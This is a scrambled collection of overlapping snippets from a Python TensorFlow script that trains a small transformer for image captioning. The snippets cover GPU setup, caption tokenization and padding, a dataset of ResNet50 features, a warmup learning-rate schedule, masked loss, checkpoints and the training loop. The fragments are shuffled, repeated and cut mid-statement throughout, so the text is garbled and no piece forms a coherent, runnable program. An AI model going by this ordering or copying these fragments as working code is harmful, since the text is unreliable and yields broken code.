"######################### # Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a", "Small Model num_layers = 4 d_model = 128 dff = d_model * 4", "reduce or increase depending on GPU capacity # Shuffle and batch dataset =", "tf.debugging.set_log_device_placement(True) # only to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: #", "print(\"Some prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) <", "= dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining on one", "the input received by # the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar)", "one batch in an epoch @tf.function def train_step(inp, tar): tar_inp = tar[:, :-1]", "storing prefixes annot = prefix + 'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"])", "768 as embedding dim, 12 attention heads # and 4H (4x768) as feedforward", "took half validation examples so we dont need to split # img_train, img_val,", "# Build Transformer Model ######################### # These parameters control the size and complexity", "includes start/end tokens dropout_rate = 0.1 EPOCHS = 20 # should see results", "\", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) < max_len: x =", "tf.DataSet for training ######################### captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only", "been initialized print(e) ############################################### ######################### # Load Data file mapping captions to images", "raining on one batch in an epoch @tf.function def train_step(inp, tar): tar_inp =", "wave on top of a surfboard.\".lower())) 
print(\"Tokenizer hydrated\") # Max length of captions", "d_model * 4 num_heads = 8 # BERT Base Model # num_layers =", "# our visual transformer code import visual_transformer as vt ####### GPU CONFIGS FOR", "- for easy reset of notebook state # chck if GPU can be", "inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only took half validation examples so we", "Training Setup ######################### # Learning Rate Schedule, as per `Attention is All You", "cap_tokenizer.encode(x) if len(x) < max_len: x = x + [0] * int(max_len -", "% 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {}", "max length of captions # which cover 99% of the captions without truncation", "try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical", "tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap", "print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build Transformer Model ######################### # These", "* 4 num_heads = 8 # BERT Base Model # num_layers = 12", "inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq)", "2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch {} at {}'.format(epoch", "## Please comment out if not training on GPU ## ## this is", "dff = d_model * 4 # as per BERT paper # num_heads =", "parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE)", "per `Attention is All You Need' paper class 
CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000):", "item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for", "Schedule, as per `Attention is All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self,", "def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2 = step * (self.warmup_steps ** -1.5)", "attention block in the decoder. # This padding mask is used to mask", "= img_names, captions # Load the numpy file with extracted ResNet50 feature def", "warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2 = step * (self.warmup_steps **", "# Load Data file mapping captions to images ######################### prefix = './data/' save_prefix", "= vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False", "tf.GradientTape() as tape: predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss", "for special tokens start = '<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda", "only took half validation examples so we dont need to split # img_train,", "loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(", "4 d_model = 128 dff = d_model * 4 num_heads = 8 #", "in an epoch @tf.function def train_step(inp, tar): tar_inp = tar[:, :-1] tar_real =", "time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar -> caption for (batch, (inp,", "= train_test_split(img_names, # captions, # test_size=0.2, # random_state=42) img_train, cap_train = img_names, captions", "as per BERT paper # num_heads = 12 target_vocab_size = 
cap_tokenizer.vocab_size # already", "tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real,", "RTX 2070/NVidia GPU ############### ## Please comment out if not training on GPU", "## this is important for running CuDNN on GPU ## tf.keras.backend.clear_session() # -", "size and complexity of the model # BERT (base) uses 12 layers, 768", "4 num_heads = 8 # BERT Base Model # num_layers = 12 #", "tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as e: # Visible", "shape should be (batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels", "# Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one", "tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\")", "can be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check GPU", "# which cover 99% of the captions without truncation max_len = int(lens.quantile(0.99) +", "checkpoint exists, restore the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') #########################", "in the 1st attention block in the decoder. 
# It is used to", "= tar[:, :-1] tar_real = tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp)", "Learning Rate Schedule, as per `Attention is All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):", "name of the saved image feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix +", "pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype)", "tf.float32) self.warmup_steps = warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2 = step", "# img_train, img_val, cap_train, cap_val = train_test_split(img_names, # captions, # test_size=0.2, # random_state=42)", "inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### # Tokenize Captions", "captions # which cover 99% of the captions without truncation max_len = int(lens.quantile(0.99)", "import matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) #", "mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') #########################", "= tf.math.rsqrt(step) arg2 = step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1,", "= inputs.img_features.tolist() # we only took half validation examples so we dont need", "dropout_rate = 0.1 EPOCHS = 20 # should see results in 4-10 epochs", "cap_val = train_test_split(img_names, # captions, # test_size=0.2, # random_state=42) img_train, cap_train = img_names,", "plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss and Metrics", "* 
tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) #", "for epoch {} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy", "self.warmup_steps = warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2 = step *", "a checkpoint exists, restore the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!')", "Begin Training for epoch in range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp", "= warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2 = step * (self.warmup_steps", "tqdm import tqdm # our visual transformer code import visual_transformer as vt #######", "img_names = inputs.img_features.tolist() # we only took half validation examples so we dont", "int(max_len - len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and", "# # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss", "enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 2nd attention block in the decoder.", "print('Saving checkpoint for epoch {} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch {} Loss", "(epoch + 1) % 2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for", "check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to only", "the size and complexity of the model # BERT (base) uses 12 layers,", "usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to only use the", "x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") # now to compute a column with", "__call__(self, step): 
arg1 = tf.math.rsqrt(step) arg2 = step * (self.warmup_steps ** -1.5) return", "parameters control the size and complexity of the model # BERT (base) uses", "= loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) /", "x.lower().strip() + end) print(\"Some prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x)", "load_img import tensorflow_datasets as tfds import numpy as np import pandas as pd", "split # img_train, img_val, cap_train, cap_val = train_test_split(img_names, # captions, # test_size=0.2, #", "'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as", "also transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size,", "= transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients =", "-> images, tar -> caption for (batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar)", "{} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch +", "# Helper function for creating masks def create_masks(inp, tar): # Encoder padding mask", "# To verify for img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\")", "for img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build", "of captions split by spaces lens = inputs['caption'].map(lambda x: len(x.split())) # Max length", "batch, train_loss.result(), train_accuracy.result())) if (epoch + 1) % 2 == 0: ckpt_save_path =", "All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, 
self).__init__() self.d_model", "function for creating masks def create_masks(inp, tar): # Encoder padding mask - This", "batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining", "train_test_split import json from glob import glob from PIL import Image import pickle", "lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will set this as the max", "= tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment to plot #", "max_to_keep=5) # if a checkpoint exists, restore the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint)", "\"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a", "We will set this as the max length of captions # which cover", "= tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for creating masks", "< max_len: x = x + [0] * int(max_len - len(x)) return x[:max_len]", "a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length of captions split by spaces lens", "ResNet50 feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset =", "1000 BATCH_SIZE = 64 # can reduce or increase depending on GPU capacity", "# as per BERT paper # num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size #", "so we dont need to split # img_train, img_val, cap_train, cap_val = train_test_split(img_names,", "attention heads # and 4H (4x768) as feedforward size # Small Model num_layers", "cap_train)) # Use map to load the numpy files in parallel dataset =", "item2], [tf.float32, tf.int32]), 
num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap in dataset.take(2): print(img.shape)", "fits in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will set this", "on GPU ## tf.keras.backend.clear_session() # - for easy reset of notebook state #", "files in parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32,", "GPU capacity # Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) #", "# Learning Rate Schedule, as per `Attention is All You Need' paper class", "\"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as e: # Visible devices must", "tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy", "dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining on one batch", "demonstrated in earlier chapters # This is a quick way if data fits", "# Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask", "ckpt_manager.save() print('Saving checkpoint for epoch {} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch {}", "= vt.create_padding_mask(inp_seq) # Used in the 2nd attention block in the decoder. 
#", "the model # BERT (base) uses 12 layers, 768 as embedding dim, 12", "state # chck if GPU can be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True)", "\"image\"]) print(\"Data file loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\")", "+ [0] * int(max_len - len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x))", "Used in the 1st attention block in the decoder. # It is used", "0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss {:.6f} Accuracy", "setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64 # can reduce or", "parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64 # can reduce or increase depending", "1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as tape: predictions, _", "mapping captions to images ######################### prefix = './data/' save_prefix = prefix + \"features/\"", "temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\")", "= pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### # Tokenize Captions #########################", "look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt =", "These parameters control the size and complexity of the model # BERT (base)", "Base Model # num_layers = 12 # d_model = 768 # dff =", "Rate Schedule, as per `Attention is All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def", "= cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate = 0.1 
EPOCHS = 20", "pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training Setup ######################### # Learning Rate Schedule,", "initialized print(e) ############################################### ######################### # Load Data file mapping captions to images #########################", "Load the numpy file with extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor =", "from PIL import Image import pickle import re import os import time import", "first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\",", "# we only took half validation examples so we dont need to split", "save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet for training ######################### captions", "as np import pandas as pd from sklearn.model_selection import train_test_split import json from", "GPU CONFIGS FOR RTX 2070/NVidia GPU ############### ## Please comment out if not", "inputs['tokenized'] = inputs['caption'].map( lambda x: start + x.lower().strip() + end) print(\"Some prepared captions:", "the 1st attention block in the decoder. 
# It is used to pad", "1, train_loss.result(), train_accuracy.result())) print('Time taken for 1 epoch: {} secs\\n'.format(time.time() - start_tm)) transformer.summary()", "(base) uses 12 layers, 768 as embedding dim, 12 attention heads # and", "[0] * int(max_len - len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions", "loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin", "dim, 12 attention heads # and 4H (4x768) as feedforward size # Small", "transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate,", "= CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") #########################", "ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training Loops ######################### # setup training", "use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus),", "tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize", "gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to only use the first", "loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask = tf.cast(mask,", "running CuDNN on GPU ## tf.keras.backend.clear_session() # - for easy reset of notebook", 
"training parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64 # can reduce or increase", "step): arg1 = tf.math.rsqrt(step) arg2 = step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model)", "mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_", "tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2 =", "GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as e: # Visible devices must be", "20 # should see results in 4-10 epochs also transformer = vt.Transformer(num_layers, d_model,", "now to compute a column with the new name of the saved image", "** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate,", "# This padding mask is used to mask the encoder outputs. dec_padding_mask =", "dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training", "= vt.create_padding_mask(inp_seq) # Used in the 1st attention block in the decoder. #", "# Small Model num_layers = 4 d_model = 128 dff = d_model *", "schedule: uncomment to plot # import matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model)", "and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of", "############################################### ######################### # Load Data file mapping captions to images ######################### prefix =", "in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will set this as", "= x + [0] * int(max_len - len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda", "in the decoder. 
# This padding mask is used to mask the encoder", "if GPU can be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to", "To verify for img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") #########################", "tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training", "# only to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict", "4-10 epochs also transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7", "loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions)", "of raining on one batch in an epoch @tf.function def train_step(inp, tar): tar_inp", "except RuntimeError as e: # Visible devices must be set before GPUs have", "preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds", "import tqdm # our visual transformer code import visual_transformer as vt ####### GPU", "= '<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start + x.lower().strip()", "the decoder. # It is used to pad and mask future tokens in", "_ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients", "# can reduce or increase depending on GPU capacity # Shuffle and batch", "is used to mask the encoder outputs. 
dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in", "this as the max length of captions # which cover 99% of the", "map to load the numpy files in parallel dataset = dataset.map(lambda item1, item2:", "= CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment", "tf from tensorflow.keras.applications.resnet50 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img", "= d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self, step): arg1", "used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 2nd attention block in the", "matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning", "ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint exists, restore the latest", "train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for creating", "import glob from PIL import Image import pickle import re import os import", "tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment to plot # import", "= prefix + 'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\")", "12 attention heads # and 4H (4x768) as feedforward size # Small Model", "= tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2", "def create_masks(inp, tar): # Encoder padding mask - This should just be 1's", "# Prepare tf.DataSet for training ######################### captions = 
inputs.tokens.tolist() img_names = inputs.img_features.tolist() #", "to be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 2nd attention block", "= int(lens.quantile(0.99) + 1) # for special tokens start = '<s>' end =", "padding mask is used to mask the encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) #", "import Image import pickle import re import os import time import datetime from", "# if a checkpoint exists, restore the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest", "one step of raining on one batch in an epoch @tf.function def train_step(inp,", "# test_size=0.2, # random_state=42) img_train, cap_train = img_names, captions # Load the numpy", "received by # the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask =", "GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus),", "tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave on top of a surfboard.\".lower())) print(\"Tokenizer", "of the captions without truncation max_len = int(lens.quantile(0.99) + 1) # for special", "img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build Transformer", "padding mask - This should just be 1's # input shape should be", "saved image feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy')", "[item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap in dataset.take(2):", "predictions) # Begin Training for epoch in range(EPOCHS): start_tm = 
time.time() train_loss.reset_states() train_accuracy.reset_states()", "Load Data file mapping captions to images ######################### prefix = './data/' save_prefix =", "predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions)", "tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) < max_len: x = x + [0]", "= tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to only use the first GPU", "tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError", "man riding a wave on top of a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max", "= time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar -> caption for (batch,", "img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map", "num_layers = 4 d_model = 128 dff = d_model * 4 num_heads =", "num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### #", "to plot # import matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model) # #", "plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy(", "results in 4-10 epochs also transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49,", "as tape: predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss =", "special tokens start = '<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x:", "layers, 768 as embedding dim, 12 attention heads # and 4H 
(4x768) as", "import datetime from tqdm import tqdm # our visual transformer code import visual_transformer", "[tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap in dataset.take(2): print(img.shape) print(cap.numpy())", "in range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar ->", "# Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave", "99% of the captions without truncation max_len = int(lens.quantile(0.99) + 1) # for", "plt.xlabel(\"Train Step\") ######################### # Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def", "cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate = 0.1 EPOCHS = 20 #", "BUFFER_SIZE = 1000 BATCH_SIZE = 64 # can reduce or increase depending on", "on top of a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length of captions split", "in 4-10 epochs also transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, #", "a quick way if data fits in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower())))", "should be (batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to", "## ## this is important for running CuDNN on GPU ## tf.keras.backend.clear_session() #", "depending on GPU capacity # Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset =", "after tokenization # tfds 